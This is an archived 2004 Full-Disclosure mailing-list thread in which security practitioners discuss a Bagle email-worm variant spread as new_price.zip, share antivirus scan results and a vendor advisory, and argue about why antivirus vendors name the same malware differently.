Re: [Full-Disclosure] (no subject)
On Wednesday 11 August 2004 02:48, Nick FitzGerald wrote: Frank Knobbe to Valdis Kletnieks: Obviously not at time of research. But these days everyone is keeping an ear on the ground... I mean Internet... while they are doing research. Actually, no. Much AV research and analysis takes place in physically isolated labs (for hopefully obvious reasons such as not contributing further to the outbreak and ensuring the lab systems are in known states). The analysts typically need relatively quiet surroundings to allow them to concentrate closely on what they are doing so as, for example, to bypass the various anti-debugging and other tricks used in much malware specifically to slow its analysis and thus increase its initial spread time. Folk working in such environments commonly have no access to their Email, the web or other normal desktop resources (IM, corporate IT systems, etc) -- they are networkologically isolated for a reason, remember. Also, even if they do have access to such resources (clean and dirty networks that are never allowed to mix by careful network planning and lack of removable media in the workstations on the clean network but located inside the dirty lab, say) they often do not _want_ to break their own concentration. I'd suggest they're not so isolated as you claim. For one thing, how do you suppose they get to hear new strains are found ? Or receive samples ? So effectively, there is a layer between them and the internet that does communicate (it doesn't really matter whether that layer is social or technological). And the analysts aren't the people naming the virii anyhow, that's probably some entirely other part of the AV company. Well, one large vendor in particular is especially notorious for not renaming malware, at least once it has released a non-beta DEF update that includes a new family name or a variant ascription. This is not peculiar to that particular developer, but is a heavily entrenched practice due in no small part to an incredibly brain-dead infrastructure underlying much of the non-detection collateral that follows addition of a virus detection to their DEF files. Great scads of support material, web descriptions and all manner of other stuff that users really like are significantly based on the _name_ the scanning engine reports when detecting a piece of malware, so once that company goes public with a name it has an enormous amount of baggage tied very closely to the name. This is, of course, entirely bad and stupid design. In fact, I'd argue it is a classic case of an abject lack of any informed design process at all, as it ties far too much ephemeralstuff (regardless of how useful/desirable to the user) to what anyone with half a clue about antivirus processes knows in the core of their being is an _entirely arbitrary and highly volatile_ identifier -- the chosen malware name... What's this ? AV vendors can't work with variable substitution ?? # $thisvirus = vendor-200408121403 $thisvirus = MyDoom-AV I'm still confused if MyDoom-O and MyDoom-M are the same thing or not. Well, they darn well should be different. Only one scan engine uses the (non-standard) -variant form so it should be the case that detections of -M and -O variants of the same family are, in fact, detections of two truly different variants. Of course, what Sophos calls MyDoom-M may well be called MyDoom.O by some other scanner(s) for one or more of the reasons likely to emerge from the situations already described above, but that is a different matter. No. It may not matter IF you only use one single brand of AV software. But that is NOT how it works in the real world. Companies tend to deploy multiple AV solutions on different layers so as to decrease the likelihood of some virus slipping through. And maybe even more importantly, Google research is done all the time, which doesn't work well if a strain goes by many different names. BTW: Perhaps the analogy to medicine was misplaced. I just thought in term of diseases. How many different names do we have for ...say... chicken pox or colitis or diabetes? Imagine you had 5 different names for the flu. I could come up with a dozen Monty Python sketches taking place in the doctors office A yes, but so long as the doctor has the machine that goes BING everything will be OK... You're missing the point. Every doctor addresses the type II diabetes as being the type II diabetes. There is no confusion whatsoever here. I agree, but having been inside it for a while and close to it for about as long before that, I don't see anything likely to compel the industry to address such issues as doing so will cost them money with no apparent return on the investment. A very large government (or group of governments) may be able to apply enough leverage through terms of purchase for its departments, so long as a naming standard the industry could
Re: [Full-Disclosure] (no subject)
Maarten to me: However, if all AV vendors (and it would have to be all vendors or market forces would prevent it happening, so guess what is one of the largest things blocking better naming coordination?) were to agree a name perfectly before _any_ of them shipped updated detection for new viruses, it is a better than than fair bet that those same outsiders would the be ones complaining longest and loudest about how tardy AV vendors were at shipping emergency updates. There is nothing stopping AV vendors from naming freshly discovered virii with an internal naming scheme (VENDOR-MMDDHHxy) pending a central database / organisation to name the virus. Then all vendors can rename the new strain from their generic temporary name to the definitive name. This is trivial, they update virus definitions all the time, why not also update the name. I can easily understand how someone unversed in the _market forces_ pertaining to antivirus software could hold that position, and as a theoretical solution to the problem of lack of cross-vendor naming coordination it has often been suggested even by though who know it would never work in the real world. Neat and tidy as such a solution seems, it will not, however, work. As I explained in other of my posts in this and the related AV Naming Convention thread, in general by far the largest cost of naming disagreement is borne by the users in the early hours of large-scale outbreaks. Thus, a solution that specifically _requires_ all vendors to use a different name until a name is agreed (no matter what this process it will take some _additional_ time) is, by design, an _anti- solution_ as such a solution, by design, ensures perfect naming inconsistency at the time the highest cost of naming inconsistency is borne. Secondly, one of the greatest impediments to ongoing (as opposed to initial, outbreak-phase) naming inconsistency is that many vendors do not have internal processes robust enough to easily handle renaming Bearing both in mind, it is obvious that the only likely useful solution to this problem will be one that allows for the fastest _and earliest_ possible resolution of VendorX and VendorY have both just seen samples of what is almost certainly the same thing which will be known as... _AND_ provides an easy, even trivial, mechanism for the right folk at VendorX and VendorY to learn of this. _FURTHER_, even if such a mechanism can be implemented, it will likely be useless as much history suggests that the vendors seem unable to change (and are certainly _unwilling_ to spend the time and effort to change their internal procedures to allow for better naming and renaming flexibility) unless there is some very large external stick being held over them (such as, perhaps, some compliance requirement for AV software to be used in any branch of the US federal government and its many and varied agencies...). This could even be good for competition; the central authority could give credit to the first discoverer by naming the virus after the vendor who first found it (but I digress here). No, please don't suggest such things. The PR and marketing folk in AV (as everywhere else) as already dangerously clueless about what their products do, who they do it and the importance of their own product. Such a naming scheme would simply add years of totally stupid marketing back into an industry sector where the technical folk have fought very long and hard to reign in the stupidity of overly emotional, grossly under-informed, generally publicity-seeking to the detriment of the industry as a whole marketing moves. In the real world, things are very often named after their discoverers or inventors. Star systems, diseases, laws, etcetera. And that is such a bad idea here for so many reasons I'm not going to waste my breath even trying to explain more than the above comment other than to add, much as it may not be apparent and much as it is far from perfect, the malware naming process we use is supposed to be a simple taxonomic system relating, at the broader view than you have the virus FooBar.X, the related-ness of similar code and differentiating less similar code. Much as the current system is imperfect, any attempt to fix malware naming that involves removing the current scheme's (weak) taxonomic structure will find extremely stiff resistance from some significant segments of the industry. Of course, the first thing is to form that central authority, but then again lots of industries have a central authority -whether decreed by law or not- so it's not something deemed impossible. Sure -- if someone is prepared to pay a few salaries, it would be relatively easy to set up some kind of naming authority. Of course, if this were done without _extensive_ consultation with AV developers, it is unlikely to be worth the effort as no-one will pay much attention to the authority,
Re: [Full-Disclosure] (no subject)
The appropriately-named Frank Knobbe wrote: Isn't the complete lack of naming standardization in the AV industry simply amazing? ... Much as less than perfect naming coordination bothers me, the amazing thing is actually that names are coordinated as well as they are (though especially bad cases such as the mish-mash of mostly generic and heuristic attempts to detect HTML-embedded vulnerability exploitation attempts, such as the one you quoted, can certainly be found to suggest that there is virtually no consistency at all). Of course, outsiders throwing stones probably shouldn't be expeceted to understand this. However, if all AV vendors (and it would have to be all vendors or market forces would prevent it happening, so guess what is one of the largest things blocking better naming coordination?) were to agree a name perfectly before _any_ of them shipped updated detection for new viruses, it is a better than than fair bet that those same outsiders would the be ones complaining longest and loudest about how tardy AV vendors were at shipping emergency updates. ... Imagine that were the case in science, particular medicine... Or perhaps it would be better to imagine that you made a more meaningful analogy, such as asking how well you think medicine would do in maintaining naming consistency if entirely new strains and variants of viruses and pathological bacteria appeared world-wide at the rate computer malware proliferates. A little exercise of the grey cells will likely suggest that they are unlikely to do better in the short term (i.e. during the outbreak phase), but would probably do much better longer-term as the dieseases, outbreaks and treatments of biological malware tend to last _MUCH_ longer than their computer cousins. If there was much oingoing need to coordinate names I think the AV industry would do better than it does now, but with the rate at which new variants appear being what it is, medium-term renaming and name coordination are both problematic and (generally) seen as having very little, if any, market value, so few people expend much effort on such renaming. -- Nick FitzGerald Computer Virus Consulting Ltd. Ph/FAX: +64 3 3529854 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] (no subject)
Isn't the complete lack of naming standardization in the AV industry simply amazing? Imagine that were the case in science, particular medicine... No shit. They should at least get together and come up with some common naming convention. They need to make some common naming authority, it's not difficult, we do it all the time with other software and as mentioned, in all scientific disciplines. Otherwise, things become very convoluted for us in the know. This is irrelevent to the general population, but is necessary for the people who have to deal with these things. How about it AV guys? (I mean to be nice here...) Todd ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] (no subject)
Todd Burroughs to Frank Knobbe: Isn't the complete lack of naming standardization in the AV industry simply amazing? Imagine that were the case in science, particular medicine... No shit. They should at least get together and come up with some common naming convention. They need to make some common naming authority, it's not difficult, we do it all the time with other software and as mentioned, in all scientific disciplines. Otherwise, things become very convoluted for us in the know. This is irrelevent to the general population, but is necessary for the people who have to deal with these things. Believe it or not we know, and things are being done about it. The scientific disciplines and others you speak of don't have to deal with things that happen in any and all possible combinations of as often, as fast, polymorphically, metamorphically, combinatorially, etc as the AV industry does _and generally_ have had several generations of academic research to form, refine, toss out and start over, etc their classifaction and naming systems. Still, I agree that we AV researchers could do naming better but there is not sufficient external pressure to force the industry to try to do a better job of naming than it currently does so it has no reason to do the hard yards that any significant improvement in naming consistency will require... How about it AV guys? (I mean to be nice here...) Other than a few voices wailing within the industry, there are some much larger scale moves afoot that just may change the there is not sufficient external pressure factor I mentioned above, though realistically these moves may take years rather than months to produce significant improvement, but they are a start... Regards, Nick FitzGerald ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] (no subject)
Isn't the complete lack of naming standardization in the AV industry simply amazing? Imagine that were the case in science, particular medicine... No shit. They should at least get together and come up with some common naming convention. They need to make some common naming authority, it's not difficult, we do it all the time with other software and as mentioned, in all scientific disciplines. Otherwise, things become very convoluted for us in the know. This is irrelevant to the general population, but is necessary for the people who have to deal with these things. heavy_irony Of course, you're making the assumption that IT Security Professionals deserve/get the respect of having a formal body of knowledge recognised by Academia and Government rather than just being a bunch of ungrateful malcontents fulminating in the wilderness instead of knuckling down to life as the hired hands of the Corporate Finance section like we bloody well should, right? /heavy_irony Let the flames begin. ;-) tom. Tom Cleary - Security Architect CSC Perth Tel. +61 8 9254 5345Mobile: 0411208423 [EMAIL PROTECTED] In IT, acceptable solutions depend upon humans - Computers don't negotiate. This is a PRIVATE message. If you are not the intended recipient, please delete without copying and kindly advise us by e-mail of the mistake in delivery. NOTE: Regardless of content, this e-mail shall not operate to bind CSC to any order or other contract unless pursuant to explicit written agreement or government initiative expressly permitting the use of e-mail for such purpose.
Re: [Full-Disclosure] (no subject)
i've worked within medicine in my previous life as an ER doc and guess what there is no formal naming standardisation within it, at least not one that there is any sort of agreement over, though people have been trying for centuries to sort something out. some use latin, some use greek, some use anglified terms, others will use their own language's interpretations of disease google helps but the variation between differing nations medical terminology can lead to a total breakdown in communication when one relies on a written record. Also, some of the less obvious jargon is derived from the name of the company (that owns the patent) that makes the device that's used in the treament of the disease. we threw a quick austin-moore into Mrs McGinty this morning using inpenetrable, rapidly-geographically-changing terminology is part of the mechanism used to obfuscate the publically available knowledge that is part of the (evil) process of preserving professional autonomy. not a good thing for medics to do but tends to be repeated in other industries as well -three letter acronym anyone? Frank Knobbe [EMAIL PROTECTED] Sent by: [EMAIL PROTECTED] 10/08/2004 01:06 To Bernardo Quintero [EMAIL PROTECTED] cc [EMAIL PROTECTED] Subject Re: [Full-Disclosure] (no subject) On Mon, 2004-08-09 at 14:43, Bernardo Quintero wrote: BitDefender 7.0/20040809 found [JS.Dword.dropper] ClamWin devel-20040727/20040809 found [Trojan.JS.RunMe] eTrustAV-Inoc 4641/20040728 found [JScript/IE.VM.Exploit] F-Prot 3.15/20040809 found [HTML/[EMAIL PROTECTED] Kaspersky 4.0.2.23/20040809 found nothing McAfee 4383/20040804 found [JS/IllWill] NOD32v2 1.836/20040809 found [Win32/Bagle.AI] Norman 5.70.10/20040806 found [W32/Malware] Panda 7.02.00/20040809 found [Fichero Sospechoso] Sybari 7.5.1314/20040809 found [JS/IllWill] Symantec 8.0/20040809 found nothing TrendMicro 7.000/20040809 found [HTML_BAGLE.AC] Isn't the complete lack of naming standardization in the AV industry simply amazing? Imagine that were the case in science, particular medicine... Makes for a nice game of AV bingo though... -Frank signature.asc Description: Binary data
Re: [Full-Disclosure] (no subject)
Michael Simpson [EMAIL PROTECTED] 10/08/2004 10:00:52 i've worked within medicine in my previous life as an ER doc and guess what there is no formal naming standardisation within it, at least not one that there is any sort of agreement over, though people have been trying for centuries to sort something out. -three letter acronym anyone? I always find the adrenaline/epinephrin naming clash amusing and confusing. Does it stem from a company Trademarking adrenaline in the USA? Because, as far as I can tell, everyone uses adrenaline as the generic term for the hormone of the same name here in the UK. Acronyms have their own pitfalls too... I've heard of numerous cases where a derogotary and unprofessional acronym was written on/in some medical notes (PITA, TWOT etc). Perhaps it should be standard practice that when the patient asks to have his/her medical notes explained to him/her, as s/he is quite entitled under the Data Protection Act, the member of staff writing said comment should explain its medical meaning and clinical significance. The scary part of acronyms comes with overloading. One derogotary (and very unprofessional) acronym I've heard about from a number of years ago was NFR, meant to stand for Normal For Ridgehill (a region with which the local hospital had some experience). NFR is more commonly used as an abbreviation for: Not For Resuscitation; from what I understand, NFR is a quite detailed set of circumstances, changing on a frequent basis, stipulating when somebody does not need resuscitation, i.e. are already beyond medical help. [disclaimer: i'm not a medic, so any corrections will be educational for me too!] Marek ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] (no subject)
On Tue, 10 Aug 2004 02:02:23 EDT, Todd Burroughs said: No shit. They should at least get together and come up with some common naming convention. They need to make some common naming authority, it's not difficult, we do it all the time with other software and as mentioned, in all scientific disciplines. Software gets named over days/weeks. They crank out a new name for an element every few years. These things need names in *MINUTES* - often while the various A/V companies are looking at different copies of a polymorphic, multi-attack piece of malware. 5 blind men and an elephant time... and you want them to agree on a name before they even agree they're looking at the same thing??? pgputs8ydAOi7.pgp Description: PGP signature
Re: [Full-Disclosure] (no subject)
On Tue, 2004-08-10 at 09:47, [EMAIL PROTECTED] wrote: Software gets named over days/weeks. They crank out a new name for an element every few years. These things need names in *MINUTES* - often while the various A/V companies are looking at different copies of a polymorphic, multi-attack piece of malware. Hey, I didn't say it would be easy, did I? 5 blind men and an elephant time... and you want them to agree on a name before they even agree they're looking at the same thing??? Obviously not at time of research. But these days everyone is keeping an ear on the ground... I mean Internet... while they are doing research. Once one company, which is working on a new strain they term BigNasty, finds out 3 others are discussion this (on the Internet or private AV channels) as the SuckThis virus, then they could adopt that name to avoid confusion. I didn't say it was easy, but they could at least make an effort. Here we are a year later and still call it Bagle or Beagle, either one. I'm still confused if MyDoom-O and MyDoom-M are the same thing or not. BTW: Perhaps the analogy to medicine was misplaced. I just thought in term of diseases. How many different names do we have for ...say... chicken pox or colitis or diabetes? Imagine you had 5 different names for the flu. I could come up with a dozen Monty Python sketches taking place in the doctors office I didn't say it was easy, but we should encourage the AV industry to work towards such a standardization. It may even be beneficial for them. Sing with me Valdis I say tomato, you say tomato, I say potato, you say potato, I say Beagle, you say Bagle, and others are calling it something else. Regards, Frank (throwing rocks at the glass palace) signature.asc Description: This is a digitally signed message part
Re: [Full-Disclosure] (no subject)
--On Monday, August 09, 2004 07:06:11 PM -0500 Frank Knobbe [EMAIL PROTECTED] wrote: Isn't the complete lack of naming standardization in the AV industry simply amazing? Imagine that were the case in science, particular medicine... Getting the AV industry to agree on virus names is about as likely as getting a government to do anything beneficial for its citizens. Paul Schmehl ([EMAIL PROTECTED]) Adjunct Information Security Officer The University of Texas at Dallas AVIEN Founding Member http://www.utdallas.edu/ir/security/ ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] (no subject)
On Tue, 10 Aug 2004 10:13:55 CDT, Frank Knobbe said: term of diseases. How many different names do we have for ...say... chicken pox or colitis or diabetes? Imagine you had 5 different names for the flu. Diabetes comes in Type 1 and Type 2, which are quite different (in one, your pancreas quits producing insulin, in the other, the insulin is produced, but not utilized well by your body). Influenza comes in many different strains as well - in fact, predicting which strains will be prevalent and should be included in flu shots is a major challenge. Strains are usually named after the closest major city to the first known outbreak, although the one that got loose in 1918 is a special case... As you were saying? pgpesSqJXH72p.pgp Description: PGP signature
Re: [Full-Disclosure] (no subject)
On Tue, 2004-08-10 at 10:25, [EMAIL PROTECTED] wrote: Diabetes comes in Type 1 and Type 2, which are quite different (in one, your pancreas quits producing insulin, in the other, the insulin is produced, but not utilized well by your body). I know, my wife has type 2. They still call it diabetes. As you were saying? If you missed the point, let me repeat it: I believe different names for the same virus confuses consumers and industry alike. I'd like to urge the industry to start adopting a common naming convention. signature.asc Description: This is a digitally signed message part
Re: [Full-Disclosure] (no subject)
On Tue, 10 Aug 2004 10:33:50 CDT, Frank Knobbe said: I know, my wife has type 2. They still call it diabetes. By that logic, we have bagle, agobot, netsky, and mydoom. No need for variant names, and no need for a name for an attack of pancreatic cancer that knocks out your insulin production, because that's just diabetes too. pgptiARdI9g5Q.pgp Description: PGP signature
Re: [Full-Disclosure] (no subject)
On Tue, 10 Aug 2004 11:44:57 -0400, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: On Tue, 10 Aug 2004 10:33:50 CDT, Frank Knobbe said: I know, my wife has type 2. They still call it diabetes. By that logic, we have bagle, agobot, netsky, and mydoom. No need for variant names, and no need for a name for an attack of pancreatic cancer that knocks out your insulin production, because that's just diabetes too. But that's the point: first of all there's Beagle/Bagle/Alu, not to mention the variants that *do* exist. Type I and II diabetes (and yes, my wife too) mean the same thing to any doctor -- whereas different folks have different variant names for the same thing. It would be more akin to some doctors reversing Type I and Type II or even adding Type III or IV without any standardization with anyone else. That said, it's clear that the answers for antivirus/malware and medicine cannot be the same due to the speed of response needed, as you and others point out. Some type of standardization would be great but it can't slow down response times. -- Kyle Maxwell [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] (no subject)
A quick Googling on Diabetes Type I and Diabetes Type II shows they are indeed different, and their difference is very clear. (See http://www.lef.org/protocols/prtcl-042.shtml for example) As common mortals, most of us don't have a clue about that (and don't need to, unless we are somehow exposed to diabetes or interested in it). But honestly, I can't imagine a medical doctor not knowing the difference... The same is true for computer viruses, people don't care and shouldn't care about virus naming: what they need is timely protection. But it's way different when it comes to the AV industry and all the ones who are somewhat involved in this matter. Cheers, Iñigo Koch Red Segura - Original Message - From: Kyle Maxwell [EMAIL PROTECTED] To: [EMAIL PROTECTED] Cc: Frank Knobbe [EMAIL PROTECTED]; [EMAIL PROTECTED] Sent: Tuesday, August 10, 2004 1:00 PM Subject: Re: [Full-Disclosure] (no subject) On Tue, 10 Aug 2004 11:44:57 -0400, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: On Tue, 10 Aug 2004 10:33:50 CDT, Frank Knobbe said: I know, my wife has type 2. They still call it diabetes. By that logic, we have bagle, agobot, netsky, and mydoom. No need for variant names, and no need for a name for an attack of pancreatic cancer that knocks out your insulin production, because that's just diabetes too. But that's the point: first of all there's Beagle/Bagle/Alu, not to mention the variants that *do* exist. Type I and II diabetes (and yes, my wife too) mean the same thing to any doctor -- whereas different folks have different variant names for the same thing. It would be more akin to some doctors reversing Type I and Type II or even adding Type III or IV without any standardization with anyone else. That said, it's clear that the answers for antivirus/malware and medicine cannot be the same due to the speed of response needed, as you and others point out. Some type of standardization would be great but it can't slow down response times. -- Kyle Maxwell [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] (no subject)
DNA matching for real diseases is at least more accurate than string matching for computer viruses. Sig-based AV scanning will always be behind on variants. If I can take a virus, change a line in it and infect 100 people without an AV product even winking, they things can be changed. But maybe I am the only person that wants to be protected? We have made the public more scared of 12 year old script kiddies then real hackers working with organized crime family. Funny the way the world works. =) -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of [EMAIL PROTECTED] Sent: Tuesday, August 10, 2004 10:45 AM To: Frank Knobbe Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] (no subject) On Tue, 10 Aug 2004 10:33:50 CDT, Frank Knobbe said: I know, my wife has type 2. They still call it diabetes. By that logic, we have bagle, agobot, netsky, and mydoom. No need for variant names, and no need for a name for an attack of pancreatic cancer that knocks out your insulin production, because that's just diabetes too. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] (no subject)
Did anyone see that article about how one the latest MyDooms wasn't a MyDoom at all, but they wanted to keep the name to avoid confusion. =) Can't find the article, plus it is lunch time. Listen all AV companines name MyDoom, MyDoom, how hard would it be to get the variant name to be somewhat equal. Is the letter in front of the back? Is there a W32 in the name? Do have mass mailers have @MM...umm nope? -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Frank Knobbe Sent: Tuesday, August 10, 2004 10:14 AM To: [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] (no subject) On Tue, 2004-08-10 at 09:47, [EMAIL PROTECTED] wrote: Software gets named over days/weeks. They crank out a new name for an element every few years. These things need names in *MINUTES* - often while the various A/V companies are looking at different copies of a polymorphic, multi-attack piece of malware. Hey, I didn't say it would be easy, did I? 5 blind men and an elephant time... and you want them to agree on a name before they even agree they're looking at the same thing??? Obviously not at time of research. But these days everyone is keeping an ear on the ground... I mean Internet... while they are doing research. Once one company, which is working on a new strain they term BigNasty, finds out 3 others are discussion this (on the Internet or private AV channels) as the SuckThis virus, then they could adopt that name to avoid confusion. I didn't say it was easy, but they could at least make an effort. Here we are a year later and still call it Bagle or Beagle, either one. I'm still confused if MyDoom-O and MyDoom-M are the same thing or not. BTW: Perhaps the analogy to medicine was misplaced. I just thought in term of diseases. How many different names do we have for ...say... chicken pox or colitis or diabetes? Imagine you had 5 different names for the flu. I could come up with a dozen Monty Python sketches taking place in the doctors office I didn't say it was easy, but we should encourage the AV industry to work towards such a standardization. It may even be beneficial for them. Sing with me Valdis I say tomato, you say tomato, I say potato, you say potato, I say Beagle, you say Bagle, and others are calling it something else. Regards, Frank (throwing rocks at the glass palace) ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] (no subject) (!!! (complement))
Definition for 'cracker' (german): http://www.net-lexikon.de/Cracker.html Von engl. to crack, dt.: knacken Ein Cracker ist eine unberechtigt in einen fremden Rechner oder ein Rechnernetz eindringende Person. Zuweilen wird zwischen Hackern und Crackern unterschieden: Während Hacker sich demnach darauf beschränken, fremde Daten auszukundschaften, verändern Cracker diese fremden Daten auch und richten damit Schäden in den Rechnern oder Computernetzen an, in die sie eingedrungen sind. Datenveränderung (§ 303a StGB) und Computersabotage (§ 303b StGB) sind nach deutschem Strafrecht strafbar. (Translation: Comes from the word 'to crack' A cracker is a person unauthorized infiltrating a computer or a computer network that belongs not to him. Sometimes it is differentiated between Hackers and Crackers: While a hacker limits himself only to view foreign data, crackers change those data too and cause damage to the infiltrated computers and computer networks by doing so ) ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] (no subject)
http://isc.sans.org/ http://www.virustotal.com/xhtml/index_en.html -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jonathan Grotegut Sent: Monday, August 09, 2004 3:04 PM To: Full-disclosure Subject: RE: [Full-Disclosure] (no subject) (In regards to new_price.zip file attachment) Anyone have any idea what this is, we had some clients just get pretty hard with this email. I am unable to find anything on it, from my VERY Limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet? Jonathan Grotegut ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] (no subject)
(In regards to new_price.zip file attachment) Anyone have any idea what this is, we had some clients just get pretty hard with this email. I am unable to find anything on it, from my VERY Limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet? Jonathan Grotegut ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] (no subject)
(In regards to new_price.zip file attachment) Anyone have any idea what this is, we had some clients just get pretty hard with this email. I am unable to find anything on it, from my VERY Limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet? http://www.incidents.org/diary.php?date=2004-08-09 Scan results (http://www.virustotal.com) File: price.zip Date: 08/09/2004 21:41:30 BitDefender 7.0/20040809 found [JS.Dword.dropper] ClamWin devel-20040727/20040809 found [Trojan.JS.RunMe] eTrustAV-Inoc 4641/20040728 found [JScript/IE.VM.Exploit] F-Prot 3.15/20040809 found [HTML/[EMAIL PROTECTED] Kaspersky 4.0.2.23/20040809 found nothing McAfee 4383/20040804 found [JS/IllWill] NOD32v2 1.836/20040809 found [Win32/Bagle.AI] Norman 5.70.10/20040806 found [W32/Malware] Panda 7.02.00/20040809 found [Fichero Sospechoso] Sybari 7.5.1314/20040809 found [JS/IllWill] Symantec 8.0/20040809 found nothing TrendMicro 7.000/20040809 found [HTML_BAGLE.AC] ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] (no subject)
I am seeing a lot of them too. Just had a call from my e-mail people. I have one that is new_price.zip (5KB) There appears to be some people on FD that are infected and we are getting a lot on my end. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jonathan Grotegut Sent: Monday, August 09, 2004 2:04 PM To: Full-disclosure Subject: RE: [Full-Disclosure] (no subject) (In regards to new_price.zip file attachment) Anyone have any idea what this is, we had some clients just get pretty hard with this email. I am unable to find anything on it, from my VERY Limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet? Jonathan Grotegut ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] (no subject)
Discovery Date : 8/10/2004 (PHL) Origin : USA Description ( updated : 8/9/2004 11:03:26 AM ) There are reports now in the USA of a malware spreading via email. The file, price.exe, is spread as a ZIP file, and is included in a supposedly manually-spammed email. This price.exe file is a downloader and attempts to download a file named 2.jpg from different sites. The sites are currently inaccessible at the time of this writing. Infected customers also report a file named as windll.exe running in the system. TrendLabs is still currently analyzing the files and will soon post a more detailed analysis. EPS Deliverables Pattern OPR 953 for WORM_BAGLE.AC - Pattern under QA Testing 8/9/2004 11:23:44 AM Thank you, Fooks, LynnBart Lansing Manager, Desktop Services Kohl's IT 262-703-2911 [EMAIL PROTECTED] wrote on 08/09/2004 02:03:54 PM: (In regards to new_price.zip file attachment) Anyone have any idea what this is, we had some clients just get pretty hard with this email. I am unable to find anything on it, from my VERY Limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet? Jonathan Grotegut ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] (no subject)
Kaspersky detect it as I-Worm.Bagle.al Todd Towles wrote: I am seeing a lot of them too. Just had a call from my e-mail people. I have one that is new_price.zip (5KB) There appears to be some people on FD that are infected and we are getting a lot on my end. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jonathan Grotegut Sent: Monday, August 09, 2004 2:04 PM To: Full-disclosure Subject: RE: [Full-Disclosure] (no subject) (In regards to new_price.zip file attachment) Anyone have any idea what this is, we had some clients just get pretty hard with this email. I am unable to find anything on it, from my VERY Limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet? Jonathan Grotegut ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] (no subject)
On Mon, August 9, 2004 12:03 pm, Jonathan Grotegut said: (In regards to new_price.zip file attachment) Anyone have any idea what this is, we had some clients just get pretty hard with this email. I am unable to find anything on it, from my VERY Limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet? I've seen several dozen of them today... getting pretty annoying. No other info, though. :| -Eric -- arctic bears - email and dns services http://www.arcticbears.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] (no subject)
F-Secure is reporting it as bangle.al. Looks like it's your basic email virus with a trojan backdoor. http://www.f-secure.com/v-descs/bagle_al.shtml Dave King, http://www.thesecure.net Jonathan Grotegut wrote: (In regards to new_price.zip file attachment) Anyone have any idea what this is, we had some clients just get pretty hard with this email. I am unable to find anything on it, from my VERY Limited knowledge it appears to be a virus exploiting one of the many holes in IE. Anyone else see anything on this yet? Jonathan Grotegut ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] (no subject)
